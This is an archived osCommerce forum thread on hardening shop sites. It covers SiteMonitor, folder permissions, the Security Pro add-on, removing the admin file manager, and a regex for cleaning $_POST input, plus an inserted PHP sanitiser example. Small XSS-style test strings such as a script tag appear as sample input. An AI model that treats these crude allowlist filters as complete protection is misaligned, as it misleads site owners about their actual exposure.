Archived

This topic is now archived and is closed to further replies.

spooks

How to secure your osCommerce 2.2 site.

I presume it is at 644

I've uploaded an empty file, and chmoded it to 777

 

When I press on 'delete reference file' it says this:

 

Reference file creation failed.

But when I look in FlashFXP the file sitemonitor_reference.php is deleted.

 

When I press on Execute Sitemonitor it says:

 

Run Sitemonitor. Reference file is not deleted.

Reference file creation failed.

 

When I delete the sitemonitor_reference.php with FlashFXP and press Execute Sitemonitor it says:

 

Run Sitemonitor. Reference file is not deleted.

1 mismatches were found. Run the script manually or see the email for the actual mismatches.

 

and this is the mail I received:

root@localhost

NEW FILES:
No new files found...

DELETED FILES:
Found a deleted file named 

SIZE MISMATCH:
Size differences not checked due to deleted file(s)

TIME MISMATCH:
Time differences not checked due to deleted file(s)

PERMISSIONS MISMATCH:
Permissions not checked due to deleted file(s)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sitemonitor ran on July 1, 2009, 1:41 pm
Total mismatches found were 1
Total files being monitored is 1


I've disabled the reviews buttons in products.php and column_right.php

 

I have also removed the files product_reviews.php / product_reviews_info.php / product_reviews_write.php

 

I’ve replaced reviews.php with a link back to the home page

 

Will this remove any security issues with customer reviews?


There are no particular issues with reviews; it's the testimonials contrib that has the issue.

 

The only thing I would advise with reviews (as with anything that uses the POST) is to sanitise the POST; I detailed earlier in this thread how.


Sam

 

Remember, what you think I meant may not be what I thought I meant when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.


Sorry, I got the two mixed up! Would I be safe in saying it's now removed from my site anyway?

 

Or will removing the files cause other problems?

 

Many thanks

Sorry, I got the two mixed up! Would I be safe in saying it's now removed from my site anyway?

 

Or will removing the files cause other problems?

 

Many thanks

 

 

Yes. Have you removed all links to those pages too? Otherwise you will get 404 errors.


Sam



ADDITIONAL ISSUE

 

Jan has pointed out a problem with ADMIN; take a look at his post:

 

http://forums.oscommerce.com/index.php?sho...p;#entry1421616


Sam


Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosts.

 

I recently switched to a VPS... so I should have control over the server. I'm finding that folders that were fine with 755 before the switch now require 777. Is there a way to config the server differently? I don't have much server-side experience.


Have you read through http://httpd.apache.org/docs/2.0/ ?


Sam


Have you read through http://httpd.apache.org/docs/2.0/ ?

 

Thanks... I glanced through it a while ago.. I'll have another look. I guess it's more important to me now that I'm running on the VPS.

 

 

After installing sitemonitor I'm getting this at the top of the sitemonitor page...

 

 

Warning: opendir(/var/www/vhosts/rhythmhousedrums.com/httpdocs/cgi-bin/tmp/) [function.opendir]: failed to open dir: Permission denied in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 168

Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 170

Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 182

 

any ideas?

Thanks... I glanced through it a while ago.. I'll have another look. I guess it's more important to me now that I'm running on the VPS.

 

 

After installing sitemonitor I'm getting this at the top of the sitemonitor page...

 

 

Warning: opendir(/var/www/vhosts/rhythmhousedrums.com/httpdocs/cgi-bin/tmp/) [function.opendir]: failed to open dir: Permission denied in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 168

Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 170

Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 182

 

any ideas?

 

Figured it out! I figured again it was with the weird permissions on my VPS... it was.


If you've been hacked then you need to look at getting your host to wipe your site, in case the hackers have left hidden back doors etc.

 

You should restore your site from your local 'clean' copy, which you did remember to take before, didn't you? I remind you that this applies to your files & database.

 

Some additional handy tools:

 

 

SiteMonitor Watches files for changes http://addons.oscommerce.com/info/4441

Protection of Configuration http://addons.oscommerce.com/info/2137

 

AutoBackup Database in Admin http://addons.oscommerce.com/info/2314

AND Database backup manager http://addons.oscommerce.com/info/5769


Sam


Just a question about these 2:

You can prevent any injection attacks with Security Pro http://addons.oscommerce.com/info/5752

 

You can monitor sites for unauthorised changes with SiteMonitor http://addons.oscommerce.com/info/4441

 

Is the SQL prevention only designed to assist with prevention of bad code in contributions? Is the standard osCommerce SQL injection prevention good enough?

I'm not quite sure how SiteMon helps. If a hacker got into your site, they might change SiteMon anyway? Of course, that would rely on a targeted hack against you, which most hackers don't do, they do mass hacks and replace pages.


Security Pro will clean inputs that some contribs fail to do; there are places in the standard osC where it helps too. As I have pointed out before, it does not clean the $_POST; see my code for that earlier.

 

SiteMon helps you find what has been changed easily, but obviously an in-depth hack could damage that too.


Sam


Security Pro will clean inputs that some contribs fail to do; there are places in the standard osC where it helps too. As I have pointed out before, it does not clean the $_POST; see my code for that earlier.

 

SiteMon helps you find what has been changed easily, but obviously an in-depth hack could damage that too.

 

I installed the XSS add on but it's not stripping html tags.

I updated an address from the admin pages and included <a>test</a> in the address and it saved the html tags to the database.

 

http://addons.oscommerce.com/info/6546

I installed the XSS add on but it's not stripping html tags.

I updated an address from the admin pages and included <a>test</a> in the address and it saved the html tags to the database.

 

http://addons.oscommerce.com/info/6546

 

I'm not certain the XSS add-on does that; install Security Pro, it's always first for me.


Sam


I'm not certain the XSS add-on does that; install Security Pro, it's always first for me.

 

Does Security Pro clean $_POST as well? Because the readme says not.

Does Security Pro clean $_POST as well? Because the readme says not.

 

I installed Security Pro but it still allowed this to get into the database when updated from the admin screen: testernew<a>test</a>

It should be stripping html tags shouldn't it?

From the normal cart it strips HTML tags but it doesn't strip off characters such as semicolons, etc., all of which could be used for SQL injections. I'm guessing these are $_POST characters, all of which a hacker could submit quite easily, no?


If you read the doc with Security Pro you will see how to adjust the cleaned chars!!

 

As I stated, see my code to clean the $_POST earlier in this thread!!

 

You will also see that Security Pro does not operate on the admin side, as most don't; they shouldn't need to!

 

 

Please start reading the docs etc. instead of asking endless aimless questions! :rolleyes:


Sam


If you read the doc with Security Pro you will see how to adjust the cleaned chars!!

 

As I stated, see my code to clean the $_POST earlier in this thread!!

 

You will also see that Security Pro does not operate on the admin side, as most don't; they shouldn't need to!

 

 

Please start reading the docs etc. instead of asking endless aimless questions! :rolleyes:

 

They're all aimed questions :)

I've read through the entire post - you don't have a post on the $_POST var in this thread.

I disagree with the admin side part, ALL user input should be cleaned regardless. Sure there are other ways to secure the admin folders but it still leaves it open to a hack...not as vulnerable as the public side though.

you don't have a post on the $_POST var in this thread.

I disagree with the admin side part, ALL user input should be cleaned regardless. Sure there are other ways to secure the admin folders but it still leaves it open to a hack...not as vulnerable as the public side though.

 

You should not be using client-side applications as the basis for securing your admin!! Use proper methods, .htaccess ideally.

 

Securing the "admin" Folder http://forums.oscommerce.com/index.php?sho...hl=admin+folder

 

If you wish to extend the scope of any contrib, modify it yourself or talk to the author.

 

I'm sure there were a number of posts on the $_POST, but I can't find them myself!! :blush: So here is the code:

 

on any pages accepting $_POST vars after:

 

 require('includes/application_top.php');

add

 

// clean posted vars
reset($_POST);
  while (list($key, $value) = each($_POST)) {
 if (!is_array($_POST[$key])) {
	  $_POST[$key] = preg_replace("/[^ /na-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));
	} else { unset($_POST[$key]); } // no arrays expected 
  }

This does not allow for arrays, additional code is needed if they are used.


Sam


You should not be using client-side applications as the basis for securing your admin!! Use proper methods, .htaccess ideally.

 

Securing the "admin" Folder http://forums.oscommerce.com/index.php?sho...hl=admin+folder

 

If you wish to extend the scope of any contrib, modify it yourself or talk to the author.

 

I'm sure there were a number of posts on the $_POST, but I can't find them myself!! :blush: So here is the code:

 

on any pages accepting $_POST vars after:

 

 require('includes/application_top.php');

add

 

// clean posted vars
reset($_POST);
  while (list($key, $value) = each($_POST)) {
 if (!is_array($_POST[$key])) {
	  $_POST[$key] = preg_replace("/[^ /na-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));
	} else { unset($_POST[$key]); } // no arrays expected 
  }

This does not allow for arrays, additional code is needed if they are used.

 

Rather than add to every page, I added just to application_top.php as every page includes that.

However, it throws errors, not recognising the "n" part of the preg_replace.

 

// addition to security pro to check the post variables as well
reset($_POST);
while (list($key, $value) = each($_POST)) {
  if (!is_array($_POST[$key])) {
    $_POST[$key] = preg_replace("/[^ /na-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));
  } else { unset($_POST[$key]); } // no arrays expected
}
//

Someone should add this to security pro probably since it misses out an entire section of html forms and the POST variable :)


use:

 

$_POST[$key] = preg_replace("/[^ a-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));

 

Security Pro is about cleaning the query string; that's why it doesn't touch the $_POST.

 

Someone should add this to security pro probably since it misses out an entire section of html forms and the POST variable

 

Contribs are voluntary, we do not accept orders!! If you want it, do it yourself!!


Sam


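The fix Sam gives above, as an added example that is not code from the thread, from osCommerce or from Security Pro: it shows why the first pattern fails under PHP's PCRE delimiter parsing, applies the corrected allowlist, and goes beyond the snippet by cleaning nested form arrays recursively instead of unsetting them. It assumes PHP 7.1+ (each() is removed in PHP 8), and that tep_db_input() stays in place as the escaping step before any query.

```php
<?php
// Added example (not from the thread, osCommerce or Security Pro): a $_POST
// allowlist cleaner in the spirit of Sam's snippet, rewritten for PHP 7.1+
// and extended to clean nested form arrays instead of dropping them.

// Sam's first pattern. PHP takes "/" as the PCRE delimiter and ends the
// pattern at the "/" inside the character class, so "na-zA-Z0-9@%:{}_.-]/i"
// is parsed as modifier flags: preg_replace() warns "Unknown modifier 'n'"
// and returns NULL, so the field would be wiped rather than cleaned.
const BROKEN_PATTERN    = "/[^ /na-zA-Z0-9@%:{}_.-]/i";
// Sam's corrected allowlist: space, letters, digits and @ % : { } _ . -
const ALLOWLIST_PATTERN = "/[^ a-zA-Z0-9@%:{}_.-]/i";

// Strip every character outside the allowlist from one scalar value.
// Returns NULL when the pattern itself fails to compile, so the caller can
// tell "cleaned down to empty" apart from "the filter did not run at all".
function clean_scalar(string $value, string $pattern = ALLOWLIST_PATTERN): ?string
{
    $out = @preg_replace($pattern, '', urldecode($value));
    return ($out === null || preg_last_error() !== PREG_NO_ERROR) ? null : $out;
}

// Clean an input array such as $_POST recursively. Keys are user-controlled
// too, so they go through the same allowlist; nested arrays (for example
// products[17][qty] from a cart form) are cleaned instead of unset.
function clean_request(array $input, string $pattern = ALLOWLIST_PATTERN): array
{
    $clean = [];
    foreach ($input as $key => $value) {
        $safeKey = clean_scalar((string) $key, $pattern);
        if ($safeKey === null || $safeKey === '') {
            continue; // key unusable after cleaning: drop the field entirely
        }
        if (is_array($value)) {
            $clean[$safeKey] = clean_request($value, $pattern);
        } else {
            $clean[$safeKey] = clean_scalar((string) $value, $pattern) ?? '';
        }
    }
    return $clean;
}

// Constructed sample input: the thread's test value plus a nested array.
// Side effect of an allowlist this narrow: O'Brien becomes OBrien, so the
// allowed set has to be tuned per field. This filter complements, and never
// replaces, tep_db_input() on the way into MySQL and htmlspecialchars() on
// the way back out to the browser.
$sample = [
    'firstname' => 'testernew<a>test</a>',
    'lastname'  => "O'Brien",
    'comments'  => "it's a gift; see <b>deal</b>",
    'products'  => ['17' => ['qty' => '2', 'note' => '<script>x</script>']],
];

var_dump(clean_scalar('testernew<a>test</a>', BROKEN_PATTERN)); // broken pattern
print_r(clean_request($sample));                                  // corrected one
```

Dropping the whole of $_POST through this at the top of application_top.php, as the poster above did, applies the same allowlist to every field on every page; fields that legitimately need apostrophes, ampersands or slashes need their own, wider pattern.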
use:

 

$_POST[$key] = preg_replace("/[^ a-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));

 

Security Pro is about cleaning the query string; that's why it doesn't touch the $_POST.

 

 

 

Contribs are voluntary, we do not accept orders!! If you want it, do it yourself!!

 

It wasn't an order, lol :)

Just seemed strange that all security is about cleaning user input therefore any security should look at all input variables. I just may add it to the contrib.


FILEMANAGER HACK

 

Just adding this note here so any future visitors are aware.

 

It has long been known that the file manager is a security risk & should, nay MUST, be removed. If used for editing your site it is likely to damage your files, so it is a bad utility to keep anyway: http://www.oscommerce.info/kb/osCommerce/Common_Problems/15 It's also been known as a possible hacking route, & to make matters worse there now exists a very nasty hack that uses the file manager to gain access to your site (database included!!).

 

So remove it now; use a normal editor such as HTML-Kit or Notepad++ after downloading all your files to your PC with an FTP client such as FileZilla.

 

To remove:

 

Delete file_manager.php from catalog/admin

 

Open admin/includes/boxes/tools.php and delete the line:

 '<a href="' . tep_href_link(FILENAME_FILE_MANAGER) . '" class="menuBoxContentLink">' . BOX_TOOLS_FILE_MANAGER . '</a><br>' .


Sam



Any idea what this hack is? I just noticed it got me last week; all my PHP files have it. What works to prevent this one? I know I put the SQL injection patch on a while back.

